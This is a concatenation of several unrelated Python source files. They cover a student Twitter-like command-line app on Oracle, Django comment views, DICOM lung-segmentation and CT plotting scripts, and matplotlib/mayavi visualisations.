{'userId':memberId})\n\t\t\t\trow1 = curs.fetchone()\n\t\t\t\tcurs.close()\n\n\t\t\t\tcurs = connection.cursor()\n\t\t\t\tcurs.prepare(\"select * from includes where lname = :listName and member = :member\")\n\t\t\t\tcurs.execute(None, {'listName':listName, 'member':memberId})\n\t\t\t\trow2 = curs.fetchone()\n\t\t\t\tcurs.close()\n\n\t\t\t\tif not row1:\n\t\t\t\t\tprint(\"The id entered does not correspond to a user, please try again.\")\n\t\t\t\telif row2:\n\t\t\t\t\tprint(\"The user is already included in the list, please try again.\")\n\t\t\t\telse:\n\t\t\t\t\taddMemberToList(connection, user_id, listName, memberId)\n\t\t\t\t\t# reprint the lists\n\t\t\t\t\tcurs = connection.cursor()\n\t\t\t\t\tcurs.prepare(\"select member from includes where lname = :listName\")\n\t\t\t\t\tcurs.execute(None, {'listName':listName})\n\t\t\t\t\trows = curs.fetchall()\n\t\t\t\t\tcurs.close()\n\n\t\t\t\t\tif len(rows) > 0:\n\t\t\t\t\t\tprint(\"List Members:\")\n\t\t\t\t\t\tfor row in rows:\n\t\t\t\t\t\t\tprint(row[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"This list has no members.\")\n\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Member to add must be a user id as a number, please try again.\")\n\n\t\telif len(inp) > 7 and inp [:7] == \"remove \":\n\t\t\t# check that the member is on the list\n\t\t\ttry:\n\t\t\t\tmemberId = int(inp[7:])\n\t\t\t\tcurs = connection.cursor()\n\t\t\t\tcurs.prepare(\"select * from includes where lname = :listName and member = :member\")\n\t\t\t\tcurs.execute(None, {'listName':listName, 'member':memberId})\n\t\t\t\trow = curs.fetchone()\n\t\t\t\tcurs.close()\n\t\t\t\tif not row:\n\t\t\t\t\tprint(\"The user id entered is not on the list, please try again.\")\n\t\t\t\telse:\n\t\t\t\t\tremoveMemberFromList(connection, user_id, listName, memberId)\n\t\t\t\t\t# reprint the lists\n\t\t\t\t\tcurs = connection.cursor()\n\t\t\t\t\tcurs.prepare(\"select member from includes where lname = :listName\")\n\t\t\t\t\tcurs.execute(None, {'listName':listName})\n\t\t\t\t\trows = curs.fetchall()\n\t\t\t\t\tcurs.close()\n\n\t\t\t\t\tif len(rows) > 0:\n\t\t\t\t\t\tprint(\"List Members:\")\n\t\t\t\t\t\tfor row in rows:\n\t\t\t\t\t\t\tprint(row[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"This list has no members\")\n\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Member to remove must be a user id as a number, please try 
again.\")\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Displays all the lists that the user is on\ndef displayOnLists(connection, user_id):\n\tlists = getOnLists(connection, user_id)\n\tif len(lists) == 0:\n\t\tprint(\"You are not on any lists.\")\n\tfor row in lists:\n\t\tprint(row)\n\n# Returns all the lists that a user is currently on\ndef getOnLists(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select l.lname, l.owner from lists l, includes i where l.lname = i.lname and i.member = :member\")\n\tcurs.execute(None, {'member':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n# Asks the user for the name of a new list to create and creates it\ndef displayCreateList(connection, user_id):\n\tlistName = \"\"\n\twhile (True):\n\t\tlistName = input(\"Type the name of the new list: \")\n\t\tif len(listName) > 12:\n\t\t\tprint(\"Maximum length of list name is 12 characters, please try again.\")\n\t\telse:\n\t\t\t# Check that this name has not already been used\n\t\t\tcurs = connection.cursor()\n\t\t\tcurs.prepare(\"select * from lists where trim(lname) = :listName\")\n\t\t\tcurs.execute(None, {'listName':listName})\n\t\t\trow = curs.fetchone()\n\t\t\tif row:\n\t\t\t\tprint(\"List name is already in use, please try another name.\")\n\t\t\t\tcurs.close()\n\t\t\telse:\n\t\t\t\tcurs.close()\n\t\t\t\tbreak\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into lists values (:listName, :owner)\")\n\tcurs.execute(None, {'listName':listName, 'owner':user_id})\n\tconnection.commit()\n\tcurs.close()\n\tprint(\"Successfully created a new list.\")\n\n# Adds a new member to an existing list\ndef addMemberToList(connection, user_id, listName, member):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into includes values (:listName, :member)\")\n\tcurs.execute(None, {'listName':listName, 'member':member})\n\tconnection.commit()\n\tcurs.close()\n\tprint(\"Successfully added member to list.\")\n\n# Removes a member from an existing list\ndef removeMemberFromList(connection, user_id, listName, member):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"delete from includes where member = :member\")\n\tcurs.execute(None, {'member':member})\n\tconnection.commit()\n\tcurs.close()\n\tprint(\"Successfully removed member from list.\")\n# Search for tweets. The user should be able to enter one or more keywords and the system should retrieve every tweet that match at least one of the keywords. The tweets should be ordered based on date from the latest to the oldest.\ndef search(connection, inp):\n while True:\n if len(inp)==0:\n print(\"Empty keyword, try again!\")\n else:\n list= inp.split()\n break\n for item in list:\n item = item.strip()\n result=[]\n for item in list:\n newitem = \"%\"+\"#\"+item+\"%\"\n item = \"%\" + item + \"%\"\n curs = connection.cursor()\n curs.prepare(\"select * from tweets where text like : item order by tdate desc\")\n #curs.prepare(\"select * from (select * from tweets where text like : item order by tdate desc)\"\n\t #\"union all select * from (select * from tweets where text like: newitem order by tdate desc)\")\n #curs.execute(None,{'item': item,'newitem': newitem})\n curs.execute(None,{'item': item})\n rows=curs.fetchall()\n for row in rows:\n result.append(row)\n\n curs.close()\n return result\n\n# If there are more than 5 matching tweets, only 5 would be shown and the user would be given an option to see more but again 5 at a time. 
The user should be able to select a tweet and see some statistics about the tweet including the number of retweets and the number of replies. Also the user should be able to compose a reply to a tweet (see the section on composing a tweet), or retweet it (i.e. repost it to all people who follow the user).\ndef displayAllTweets(connection):\n\tinp = input(\"Please input keyword: \")\n\trows = search(connection, inp)\n\tif len(rows) > 0:\n\t\tprint(\"tweets list,please choose:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 5 tweets have been printed or we have reached the end of the tweets\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the tweets\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 tweets were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweets, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if only a single tweet was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the tweets, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % (i))\n\n\t\t\t\t\t\t# Either 2, 3, or 4 tweet was printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweets, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-(i%5)+1), i))\n\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweet\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more tweets to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweets, \"\n\t\t\t\t\t\t\"'more' to view the next 5 tweets, or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweet\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\n\t\t\t\t# A tweet was selected\n\t\t\t\telse:\n\t\t\t\t\t\n displayTweetStats(connection, rows[int(inp)-1][1], rows[int(inp)-1][0])\n\n\n indices = []\n if i%5 == 0:\n i = i-5\n else:\n i = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No suit tweets .\")\n\ndef main():\n\tconnection = getConnection()\n\n\t# Let the user login or create an account\n\tret = displayLoginOrCreate(connection)\n\tcreatedAccount = ret[0]\n\tuser_id = ret[1]\n\n\t# There was not a new account created so show the tweets and retweets\n\tif not createdAccount:\n\t\tdisplayTweetsAndRetweets(connection, user_id)\n\n\t# MENU\n\twhile (True):\n\t\tinp = input(\"Type 'search tweets' to search tweets, 'search users' to search users, 'compose tweet' to write a tweet, 'list followers' to list your followers, 'manage lists' to see lists, or 'logout' to logout: \")\n\n\t\tif inp == \"search 
tweets\":\n\t\t\tdisplayAllTweets(connection)\n\n\t\telif inp == \"search users\":\n\t\t\tdisplayAllUsers(connection, user_id)\n\n\t\telif inp == \"compose tweet\":\n\t\t\tdisplayComposeTweet(connection, user_id, None)\n\n\t\telif inp == \"list followers\":\n\t\t\tdisplayAllFollowers(connection,user_id)\n\n\t\telif inp == \"manage lists\":\n\t\t\tdisplayManageLists(connection, user_id)\n\n\t\telif inp == \"logout\":\n\t\t\tbreak\n\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\tconnection.commit()\n\tconnection.close()\n\nif __name__ == \"__main__\":\n main()","sub_path":"Project1/miniProject1master.py","file_name":"miniProject1master.py","file_ext":"py","file_size_in_byte":32767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607411979","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom mayavi import mlab\nimport json\n\n\nwith open('../src/params.json') as data_file: \n params = json.load(data_file)\n\n# conv2\nw = np.loadtxt('weights_conv2.txt')\nw = w.reshape((params['layers'][3]['map_num'], params['layers'][1]['map_num'], params['layers'][3]['win_len'], params['layers'][3]['win_len']))\n\nfor i in range(100):\n # mlab.pipeline.volume(mlab.pipeline.scalar_field(w[i]))\n mlab.pipeline.glyph(mlab.pipeline.scalar_scatter(w[i]))\n mlab.show()\n","sub_path":"output/plot3d.py","file_name":"plot3d.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519098379","text":"from django.shortcuts import render\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\n\nfrom .models import Comment\nfrom .forms import CommentForm, ReplyForm, EditForm\nfrom .decorators import require_ajax\n\nclass CommentsContextMixin:\n login_url = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n comments = Comment.objects.filter(object_id=self.request.session['comments_owner_id'])\n data = {\n 'comments': comments,\n 'comment_form': CommentForm(),\n 'reply_form': ReplyForm(),\n 'edit_form': EditForm(),\n 'login_url': self.login_url\n }\n context.update(data)\n return context\n\n@login_required\n@require_POST\n@require_ajax\ndef add_comment(request): \n form = CommentForm(request.POST)\n if form.is_valid():\n form.save(commit=False)\n form.instance.author = request.user\n form.instance.content_type_id = ContentType.objects.get(\n model=request.session['comments_owner_model_name']).id\n form.instance.object_id = request.session['comments_owner_id']\n form.save()\n context = {\n # returns created comment in an QuerySet (itterable object is required because template uses forloop tag).\n # First comment in QuerySet is just created one, because of ordering = ['-pub_date'].\n 'comments': Comment.objects.all()[0:1],\n 'reply_form': ReplyForm(),\n 'edit_form': EditForm()\n }\n return render(request, 'comments/comments.html', context)\n\n@login_required\n@require_POST\n@require_ajax\ndef add_reply(request):\n form = ReplyForm(request.POST)\n parent_id = request.POST.get('parentId')\n if form.is_valid():\n form.save(commit=False)\n form.instance.author = request.user\n form.instance.content_type_id = ContentType.objects.get(model='comment').id\n form.instance.object_id = form.instance.parent_id = 
parent_id\n form.save()\n context = {\n 'reply': Comment.objects.latest('pub_date'),\n 'edit_form': EditForm(),\n 'create_reply': True # bool just for check in template\n } \n return render(request, 'comments/replies.html', context)\n\n@login_required\n@require_POST\n@require_ajax\ndef edit_comment_or_reply(request, pk):\n target = get_object_or_404(Comment, pk=pk)\n form = EditForm(request.POST)\n if form.is_valid():\n target.text = form.cleaned_data['text']\n target.save()\n return HttpResponse(target.text)\n \n@login_required\n@require_POST\n@require_ajax\ndef delete_comment_or_reply(request, pk):\n target = get_object_or_404(Comment, pk=pk)\n target.delete()\n if target.is_reply():\n return HttpResponse('
Reply deleted')\n    return HttpResponse('Comment deleted
    ')","sub_path":"comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224444335","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 14 23:50:22 2018\r\n\r\n@author: Chandrakant Pattekar\r\n\"\"\"\r\n\r\nimport numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\nimport dicom\r\nimport os\r\nimport scipy.ndimage\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom skimage import measure, morphology\r\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\r\n\r\n#newpath = \"C:\\\\Users\\\\echtpar\\\\Anaconda3\\\\KerasProjects\\\\Keras-CNN-Tutorial\\\\AllLuna16Data\\\\R_004\\\\06-30-1997-Diagnostic Pre-Surgery Contrast Enhanced CT-71813\\\\3- NONE -29295\"\r\n\r\n\r\ndef plot_3d(image, threshold=-300):\r\n\r\n \r\n # Position the scan upright, \r\n # so the head of the patient would be at the top facing the camera\r\n #p = first_patient_pixels.transpose(2,1,0)\r\n \r\n p = pix_resampled.transpose(2,1,0)\r\n verts, faces, norm, val = measure.marching_cubes(p, threshold)\r\n \r\n \r\n fig = plt.figure(figsize=(10, 10))\r\n ax = fig.add_subplot(111, projection='3d')\r\n \r\n # Fancy indexing: `verts[faces]` to generate a collection of triangles\r\n mesh = Poly3DCollection(verts[faces], alpha=0.70)\r\n face_color = [0.45, 0.45, 0.75]\r\n mesh.set_facecolor(face_color)\r\n ax.add_collection3d(mesh)\r\n \r\n ax.set_xlim(0, p.shape[0])\r\n ax.set_ylim(0, p.shape[1])\r\n ax.set_zlim(0, p.shape[2])\r\n \r\n plt.show()\r\n\r\n\r\ndef largest_label_volume(im, bg=-1):\r\n vals, counts = np.unique(im, return_counts=True)\r\n\r\n counts = counts[vals != bg]\r\n vals = vals[vals != bg]\r\n\r\n if len(counts) > 0:\r\n return vals[np.argmax(counts)]\r\n else:\r\n return None\r\n\r\n\r\n\r\n# Some constants \r\nINPUT_FOLDER = os.getcwd()\r\nprint(INPUT_FOLDER)\r\npath = os.path.join(INPUT_FOLDER, \"AllLuna16Data\\\\R_004\\\\06-30-1997-Diagnostic Pre-Surgery Contrast Enhanced CT-71813\\\\3- NONE -29295\")\r\npatients = os.listdir(path)\r\nprint(patients)\r\npatients.sort()\r\n\r\n\r\n#path = path + patients[0]\r\n#print(path)\r\n\r\nslices = [dicom.read_file(path + '/' + s) for s in os.listdir(path)]\r\ny = [x.ImagePositionPatient for x in slices]\r\nprint(y)\r\n\r\nprint(len(slices))\r\n\r\nprint(\"look at attributes of slices\")\r\nprint(\"============================\")\r\nq = [x for x in dir(slices)]\r\nprint(dir(slices))\r\n\r\nprint(\"\\n look at attributes of individual slice\")\r\nprint(\"============================\")\r\nprint([y for y in dir(slices[0])])\r\n\r\nprint('AcquisitionNumber',slices[0].AcquisitionNumber)\r\nprint('BitsAllocated',slices[0].BitsAllocated)\r\nprint('BitsStored',slices[0].BitsStored)\r\nprint('Columns',slices[0].Columns)\r\nprint('FrameOfReferenceUID', slices[0].FrameOfReferenceUID)\r\nprint('HighBit',slices[0].HighBit)\r\nprint('ImageOrientationPatient',slices[0].ImageOrientationPatient)\r\nprint('ImagePositionPatient',slices[0].ImagePositionPatient)\r\nprint('InstanceNumber',slices[0].InstanceNumber)\r\nprint('KVP',slices[0].KVP)\r\nprint('Modality',slices[0].Modality)\r\nprint('PatientBirthDate',slices[0].PatientBirthDate)\r\nprint('PatientID',slices[0].PatientID)\r\nprint('PatientName',slices[0].PatientName)\r\nprint('PatientOrientation',slices[0].PatientOrientation)\r\nprint('PhotometricInterpretation',slices[0].PhotometricInterpretation)\r\nprint('PixelData 
length',len(slices[0].PixelData))\r\nprint('PixelPaddingValue',slices[0].PixelPaddingValue)\r\nprint('PixelRepresentation',slices[0].PixelRepresentation)\r\nprint('PixelSpacing',slices[0].PixelSpacing)\r\nprint('PositionReferenceIndicator',slices[0].PositionReferenceIndicator)\r\nprint('RescaleIntercept',slices[0].RescaleIntercept)\r\nprint('RescaleSlope',slices[0].RescaleSlope)\r\nprint('Rows',slices[0].Rows)\r\nprint('SOPClassUID',slices[0].SOPClassUID)\r\nprint('SOPInstanceUID',slices[0].SOPInstanceUID)\r\nprint('SamplesPerPixel',slices[0].SamplesPerPixel)\r\nprint('SeriesDescription',slices[0].SeriesDescription)\r\nprint('SeriesInstanceUID',slices[0].SeriesInstanceUID)\r\nprint('SeriesNumber',slices[0].SeriesNumber)\r\nprint('SliceLocation',slices[0].SliceLocation)\r\nprint('SpecificCharacterSet',slices[0].SpecificCharacterSet)\r\nprint('StudyInstanceUID',slices[0].StudyInstanceUID)\r\nprint('WindowCenter',slices[0].WindowCenter)\r\nprint('WindowWidth',slices[0].WindowWidth)\r\n\r\n\r\n\r\nslices.sort(key = lambda x: float(x.ImagePositionPatient[2]))\r\ntry:\r\n slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])\r\nexcept:\r\n slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)\r\n \r\nfor s in slices:\r\n s.SliceThickness = slice_thickness\r\n \r\nfirst_patient = slices\r\n\r\nprint(slices[0])\r\n\r\nprint(slices[0].pixel_array.shape)\r\n\r\nimage = np.stack([s.pixel_array for s in slices])\r\n # Convert to int16 (from sometimes int16), \r\n # should be possible as values should always be low enough (<32k)\r\nimage = image.astype(np.int16)\r\n\r\n # Set outside-of-scan pixels to 0\r\n # The intercept is usually -1024, so air is approximately 0\r\nimage[image == -2000] = 0\r\n \r\n # Convert to Hounsfield units (HU)\r\nfor slice_number in range(len(slices)):\r\n \r\n intercept = slices[slice_number].RescaleIntercept\r\n slope = slices[slice_number].RescaleSlope\r\n \r\n if slope != 1:\r\n image[slice_number] = slope * image[slice_number].astype(np.float64)\r\n image[slice_number] = image[slice_number].astype(np.int16)\r\n \r\n image[slice_number] += np.int16(intercept)\r\n \r\nfirst_patient_pixels = np.array(image, dtype=np.int16)\r\n\r\n\r\nf, ax = plt.subplots(10,5, figsize=(25,25))\r\n\r\naxes = ax.flat\r\n\r\nfor i, x in enumerate(axes):\r\n x.imshow(first_patient_pixels[i-1], cmap=plt.cm.gray)\r\n x.axis(\"off\")\r\n\r\nplt.show()\r\n\r\n\r\nfig = plt.figure()\r\nplt.hist(first_patient_pixels.flatten(), bins=80, color='c')\r\nplt.xlabel(\"Hounsfield Units (HU)\")\r\nplt.ylabel(\"Frequency\")\r\nplt.show()\r\n\r\n# Show some slice in the middle\r\nfig = plt.figure()\r\nplt.imshow(first_patient_pixels[67], cmap=plt.cm.gray)\r\nplt.show()\r\n\r\n\r\n\r\nprint(first_patient[0].SliceThickness)\r\n\r\nprint(first_patient[0].PixelSpacing)\r\n\r\nprint(first_patient_pixels.shape)\r\n\r\n\r\n\r\nprint(len(first_patient))\r\nprint(first_patient[0].pixel_array.shape)\r\nprint(type(first_patient))\r\n\r\nprint(len(first_patient_pixels))\r\nprint(first_patient_pixels.shape)\r\nprint(type(first_patient_pixels))\r\n\r\n\r\n\r\nimage = first_patient_pixels\r\nscan = first_patient\r\nnew_spacing=[1,1,1]\r\n\r\n\r\nspacing = np.hstack([[first_patient[0].SliceThickness], first_patient[0].PixelSpacing])\r\nspacing = np.array(spacing, dtype=np.float32)\r\nprint(spacing)\r\nprint(type(spacing))\r\n\r\nresize_factor = spacing / new_spacing\r\nprint(resize_factor, spacing, new_spacing)\r\n\r\n\r\nnew_real_shape = image.shape * 
resize_factor\r\nprint(new_real_shape)\r\n\r\n\r\nnew_shape = np.round(new_real_shape)\r\nprint(new_shape)\r\n\r\nreal_resize_factor = new_shape / image.shape\r\nprint(real_resize_factor)\r\n\r\n\r\nnew_spacing = spacing / real_resize_factor\r\nprint(new_spacing)\r\n\r\n\r\nimage = scipy.ndimage.interpolation.zoom(image, real_resize_factor, mode='nearest')\r\npix_resampled, spacing = image, new_spacing\r\n\r\n\r\nprint(pix_resampled.shape)\r\nprint(spacing)\r\n\r\n\r\nprint(\"Shape before resampling\\t\", first_patient_pixels.shape)\r\nprint(\"Shape after resampling\\t\", pix_resampled.shape)\r\n\r\nplot_3d(pix_resampled, 400) \r\n\r\n\r\nimage = pix_resampled\r\nprint(np.unique(image))\r\nfill_lung_structures=True\r\n# not actually binary, but 1 and 2. \r\n# 0 is treated as background, which we do not want\r\nbinary_image = np.array(image > -320, dtype=np.int8)+1\r\nprint(binary_image.shape)\r\nprint(image.shape)\r\n\r\n\r\nprint(np.unique(binary_image))\r\nprint(np.unique(image))\r\n\r\n\r\nlabels = measure.label(binary_image)\r\nprint(len([x.shape for x in labels]))\r\n\r\nprint(len(np.unique(labels)))\r\n#print(labels[1,1,1])\r\nprint(binary_image[labels == 100])\r\n \r\n# Pick the pixel in the very corner to determine which label is air.\r\n# Improvement: Pick multiple background labels from around the patient\r\n# More resistant to \"trays\" on which the patient lays cutting the air \r\n# around the person in half\r\nbackground_label = labels[0,0,0]\r\nprint(background_label)\r\n\r\n \r\n#Fill the air around the person\r\nbinary_image[background_label == labels] = 2\r\nz = measure.label(binary_image)\r\nprint(len(np.unique(z)))\r\nprint(binary_image[z == 100])\r\n \r\n\r\nfor i, x in enumerate(binary_image):\r\n print(i,x.shape)\r\n print(np.unique(measure.label(x-1), return_counts=True))\r\n #print(measure.label(x-1)[0].shape)\r\n #print(measure.label(x-1)[1].shape)\r\n \r\n \r\n \r\n# Method of filling the lung structures (that is superior to something like \r\n# morphological closing)\r\nif fill_lung_structures:\r\n # For every slice we determine the largest solid structure\r\n for i, axial_slice in enumerate(binary_image):\r\n axial_slice = axial_slice - 1\r\n labeling = measure.label(axial_slice)\r\n\r\n #####\r\n im = labeling\r\n bg = 0\r\n vals, counts = np.unique(im, return_counts=True)\r\n print(vals,counts)\r\n counts = counts[vals != bg]\r\n vals = vals[vals != bg]\r\n\r\n if len(counts) > 0:\r\n l_max = vals[np.argmax(counts)]\r\n else:\r\n l_max = None \r\n \r\n #####\r\n \r\n if l_max is not None: #This slice contains some lung\r\n binary_image[i][labeling != l_max] = 1\r\n\r\n \r\nbinary_image -= 1 #Make the image actual binary\r\nbinary_image = 1-binary_image # Invert it, lungs are now 1\r\n \r\n# Remove other air pockets insided body\r\nlabels = measure.label(binary_image, background=0)\r\nl_max = largest_label_volume(labels, bg=0)\r\nif l_max is not None: # There are air pockets\r\n binary_image[labels != l_max] = 0\r\n \r\nsegmented_lungs = binary_image\r\n\r\n\r\nplot_3d(segmented_lungs, 0)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef load_scan(path):\r\n slices = [dicom.read_file(path + '/' + s) for s in os.listdir(path)]\r\n slices.sort(key = lambda x: float(x.ImagePositionPatient[2]))\r\n try:\r\n slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])\r\n except:\r\n slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)\r\n \r\n for s in slices:\r\n s.SliceThickness = slice_thickness\r\n \r\n return 
slices\r\n\r\n\r\n\r\ndef get_pixels_hu(slices):\r\n image = np.stack([s.pixel_array for s in slices])\r\n # Convert to int16 (from sometimes int16), \r\n # should be possible as values should always be low enough (<32k)\r\n image = image.astype(np.int16)\r\n\r\n # Set outside-of-scan pixels to 0\r\n # The intercept is usually -1024, so air is approximately 0\r\n image[image == -2000] = 0\r\n \r\n # Convert to Hounsfield units (HU)\r\n for slice_number in range(len(slices)):\r\n \r\n intercept = slices[slice_number].RescaleIntercept\r\n slope = slices[slice_number].RescaleSlope\r\n \r\n if slope != 1:\r\n image[slice_number] = slope * image[slice_number].astype(np.float64)\r\n image[slice_number] = image[slice_number].astype(np.int16)\r\n \r\n image[slice_number] += np.int16(intercept)\r\n \r\n return np.array(image, dtype=np.int16)\r\n\r\n\r\n\r\n\r\n\r\ndef resample(image, scan, new_spacing=[1,1,1]):\r\n # Determine current pixel spacing\r\n #spacing = np.array(np.array(scan[0].SliceThickness) + np.array(scan[0].PixelSpacing[0]), dtype=np.float32)\r\n\r\n spacing = np.hstack([[scan[0].SliceThickness], scan[0].PixelSpacing])\r\n resize_factor = spacing / new_spacing\r\n new_real_shape = image.shape * resize_factor\r\n new_shape = np.round(new_real_shape)\r\n real_resize_factor = new_shape / image.shape\r\n new_spacing = spacing / real_resize_factor\r\n \r\n image = scipy.ndimage.interpolation.zoom(image, real_resize_factor, mode='nearest')\r\n \r\n return image, new_spacing\r\n\r\n\r\n\r\npix_resampled, spacing = resample(first_patient_pixels, first_patient, [1,1,1])\r\nprint(\"Shape before resampling\\t\", first_patient_pixels.shape)\r\nprint(\"Shape after resampling\\t\", pix_resampled.shape)\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\ndef segment_lung_mask(image, fill_lung_structures=True):\r\n \r\n # not actually binary, but 1 and 2. 
\r\n # 0 is treated as background, which we do not want\r\n binary_image = np.array(image > -320, dtype=np.int8)+1\r\n labels = measure.label(binary_image)\r\n \r\n # Pick the pixel in the very corner to determine which label is air.\r\n # Improvement: Pick multiple background labels from around the patient\r\n # More resistant to \"trays\" on which the patient lays cutting the air \r\n # around the person in half\r\n background_label = labels[0,0,0]\r\n \r\n #Fill the air around the person\r\n binary_image[background_label == labels] = 2\r\n \r\n \r\n # Method of filling the lung structures (that is superior to something like \r\n # morphological closing)\r\n if fill_lung_structures:\r\n # For every slice we determine the largest solid structure\r\n for i, axial_slice in enumerate(binary_image):\r\n axial_slice = axial_slice - 1\r\n labeling = measure.label(axial_slice)\r\n l_max = largest_label_volume(labeling, bg=0)\r\n \r\n if l_max is not None: #This slice contains some lung\r\n binary_image[i][labeling != l_max] = 1\r\n\r\n \r\n binary_image -= 1 #Make the image actual binary\r\n binary_image = 1-binary_image # Invert it, lungs are now 1\r\n \r\n # Remove other air pockets insided body\r\n labels = measure.label(binary_image, background=0)\r\n l_max = largest_label_volume(labels, bg=0)\r\n if l_max is not None: # There are air pockets\r\n binary_image[labels != l_max] = 0\r\n \r\n return binary_image\r\n\r\nsegmented_lungs = segment_lung_mask(pix_resampled, False)\r\nsegmented_lungs_fill = segment_lung_mask(pix_resampled, True)\r\n\r\n\r\nplot_3d(segmented_lungs_fill, 0)\r\nplot_3d(segmented_lungs_fill - segmented_lungs, 0)\r\n\r\n\r\n\r\n\r\n","sub_path":"LearnKaggleLungDetectionDicom.py","file_name":"LearnKaggleLungDetectionDicom.py","file_ext":"py","file_size_in_byte":13746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154040612","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.style\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\nplt.style.use(\"seaborn-muted\")\r\n\r\ndf = pd.read_csv(\"Optimize.csv\").iloc[:, :-1]\r\ndata = df.values\r\n\r\ndf = df.sort_values(by=['Percent of 10D Avg'])\r\ngrouped = df.groupby([\"NR Days\"])\r\n\r\nx, y, z = [], [], []\r\n\r\nfor name, group in grouped:\r\n x.append(group.iloc[:, 2].tolist())\r\n y.append(group.iloc[:, 1].tolist())\r\n z.append(group.iloc[:, 0].tolist())\r\n\r\nx, y, z = np.array(x), np.array(y), np.array(z)\r\n\r\ncolumns = df.columns.tolist()\r\ndef get_lims(l):\r\n return (np.min(l), np.max(l))\r\n\r\ncolor_map = cm.jet\r\n\r\n\r\nfig = plt.figure(figsize=(20, 10))\r\n\r\nax = fig.gca(projection='3d')\r\nax.xaxis._axinfo['label']['space_factor'] = 10\r\n\r\nsurf = ax.plot_surface(x, y, z, cmap=cm.jet, linewidth=0.2, antialiased=True, edgecolor=\"black\", shade=True)\r\n\r\n\r\nax.set_xlabel(columns[2],fontsize=20)\r\nax.set_ylabel(columns[1],fontsize=20)\r\nax.set_zlabel(columns[0],fontsize=20)\r\n\r\n\r\nax.set_xlim(get_lims(data[:, 2]))\r\nax.set_ylim(get_lims(data[:, 1]))\r\nax.set_zlim(get_lims(data[:, 0]))\r\n\r\nax.set_xticks(np.arange(np.min(data[:, 2]), np.max(data[:, 2]), 1))\r\nax.set_xticklabels(map(lambda x: 